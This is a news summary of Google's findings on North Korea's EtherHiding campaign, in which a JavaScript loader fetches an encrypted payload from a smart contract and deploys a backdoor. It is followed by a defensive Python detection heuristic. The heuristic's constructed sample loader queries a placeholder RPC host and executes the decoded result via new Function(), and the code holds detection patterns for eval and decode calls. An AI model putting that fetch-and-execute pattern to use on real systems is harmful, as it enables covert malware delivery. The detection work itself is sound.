North Korea uses blockchains as indelible malware hosts
Briefly

"EtherHiding uses smart contracts on blockchains such as Ethereum and BNB Smart Chain to hide and spread malicious code. This approach provides attackers with a virtually indestructible infrastructure, as the data on the blockchain is decentralized, transparent, and immutable. In the context of cybercrime, EtherHiding is considered a form of bulletproof hosting. This is infrastructure that is immune to legal or technical removal."
"In the campaign, UNC5342 approaches victims via fake job advertisements. The attackers pose as recruiters from well-known technology companies and convince targets to perform test assignments or download files. These files contain the JADESNOW malware, a JavaScript loader. This connects to a smart contract on the blockchain. It contains an encrypted payload that, once decrypted, initiates the second phase of infection. Ultimately, the INVISIBLEFERRET backdoor is executed, giving the attackers long-term access to the system and enabling them to steal data or cryptocurrency."
"According to Google researchers, in addition to UNC5342, financially motivated actors such as UNC5142 also use EtherHiding to spread malware. The advantages of this technique are considerable: the decentralized nature of blockchains prevents smart contracts from being deleted, immutability protects against modification, transactions remain pseudonymous, and retrieving the malware leaves no traces in log files. Furthermore, attackers can update their malicious code at any time. Creating or modifying a smart contract typically costs less than two dollars, making EtherHiding a cheap and efficient method."
UNC5342 has used EtherHiding since early 2025 to target developers in the crypto and technology sectors through social engineering. The campaign lures victims with fake job advertisements and persuades them to perform test assignments or download files containing the JADESNOW JavaScript loader. JADESNOW connects to a smart contract that stores an encrypted payload on public blockchains; once decrypted, the payload initiates a second-stage infection that deploys the INVISIBLEFERRET backdoor for long-term access and data or cryptocurrency theft. EtherHiding leverages blockchain decentralization, immutability, pseudonymous transactions, low deployment cost, and modifiable smart contracts to provide resilient, hard-to-remove malware hosting.
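The summary above describes the EtherHiding chain from the defender's side: a JavaScript loader reads data from a smart contract, decodes it, and executes the result. Because the read is an ordinary, unauthenticated RPC query that a legitimate dapp also makes, the thing worth looking for in a script is the combination of a chain read with a decode step and dynamic code execution. The following triage heuristic is an added example written for this page; it is not from Google's report or from Techzine, and the sample scripts, contract addresses and endpoints in it are constructed placeholders, not indicators from the campaign.

```python
"""Heuristic triage for scripts that read code from a smart contract and run it.

Added example for this page (not Google's or Techzine's code). It scores a
JavaScript source on three indicator groups:
  rpc_read  - a read-only chain query (eth_call, a public RPC host, a 40-hex
              address literal)
  decode    - atob(), hex-to-string loops, or a decrypt/xor helper
  dyn_exec  - eval(), new Function(), or setTimeout with a string body
A chain read alone is normal dapp behaviour; only rpc_read combined with
dyn_exec is reported, and decode raises the confidence.
"""
import re

# Indicator groups: (label, compiled regex). Patterns are deliberately simple
# and will miss obfuscated code; they are a first-pass filter, not a verdict.
RPC_READ = [
    ("json-rpc eth_call", re.compile(r'["\']eth_call["\']')),
    ("public rpc endpoint",
     re.compile(r'https?://[\w.-]*(bsc-dataseed|infura|alchemy|ankr)[\w./-]*', re.I)),
    ("contract address literal", re.compile(r'0x[0-9a-fA-F]{40}')),
]
DECODE = [
    ("atob()", re.compile(r'\batob\s*\(')),
    ("hex-to-string loop", re.compile(r'fromCharCode\s*\(\s*parseInt')),
    ("decrypt/xor helper", re.compile(r'\b(decrypt|xor)\w*\s*\(', re.I)),
]
DYN_EXEC = [
    ("eval()", re.compile(r'\beval\s*\(')),
    ("new Function()", re.compile(r'\bnew\s+Function\s*\(')),
    ("setTimeout(string)", re.compile(r'setTimeout\s*\(\s*["\']')),
]


def scan_script(src):
    """Return indicator hits per group and a confidence level for one script."""
    hits = {}
    for group, patterns in (("rpc_read", RPC_READ), ("decode", DECODE), ("dyn_exec", DYN_EXEC)):
        hits[group] = [label for label, rx in patterns if rx.search(src)]
    if hits["rpc_read"] and hits["dyn_exec"]:
        level = "high" if hits["decode"] else "medium"
    else:
        level = "none"
    return {"suspicious": level != "none", "level": level, "hits": hits}


def triage(scripts):
    """Scan a {name: source} mapping and return {name: level}."""
    return {name: scan_script(src)["level"] for name, src in scripts.items()}


# --- constructed sample inputs (placeholders, not real indicators) ---------
SUSPICIOUS_LOADER = r'''
const rpc = "https://rpc.example-placeholder.invalid/";          // placeholder
const addr = "0x1111111111111111111111111111111111111111";       // placeholder
fetch(rpc, {method: "POST", body: JSON.stringify({jsonrpc: "2.0", id: 1,
  method: "eth_call", params: [{to: addr, data: "0x00000000"}, "latest"]})})
  .then(r => r.json())
  .then(j => new Function(atob(j.result.slice(2)))());
'''

BENIGN_DAPP = r'''
const provider = "https://mainnet.infura.io/v3/PLACEHOLDER_KEY";  // placeholder
const token = "0x2222222222222222222222222222222222222222";      // placeholder
async function showBalance() {
  const res = await fetch(provider, {method: "POST", body: JSON.stringify({
    jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: token, data: "0x00000000"}, "latest"]})});
  const j = await res.json();
  document.getElementById("bal").textContent = parseInt(j.result, 16);
}
'''

BENIGN_EVAL = r'''
const cfg = eval("(" + document.getElementById("cfg").textContent + ")");
'''

SAMPLES = {"loader": SUSPICIOUS_LOADER, "dapp": BENIGN_DAPP, "cfg": BENIGN_EVAL}

if __name__ == "__main__":
    for name, level in triage(SAMPLES).items():
        print(f"{name:8s} {level:7s} {scan_script(SAMPLES[name])['hits']}")
```

The point of the three-way split is the false-positive budget: a wallet or exchange front end hits `rpc_read` on every page load, and plenty of old code calls `eval`, so neither alone should page anyone. The combination, especially with a decode step between the chain read and the execution, is the shape the summary describes and is rare in legitimate front ends. Network-side, the same read shows up as a POST to an RPC host carrying `"method":"eth_call"`, which is the trace the loader leaves even though the contract itself records nothing.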
Read at Techzine Global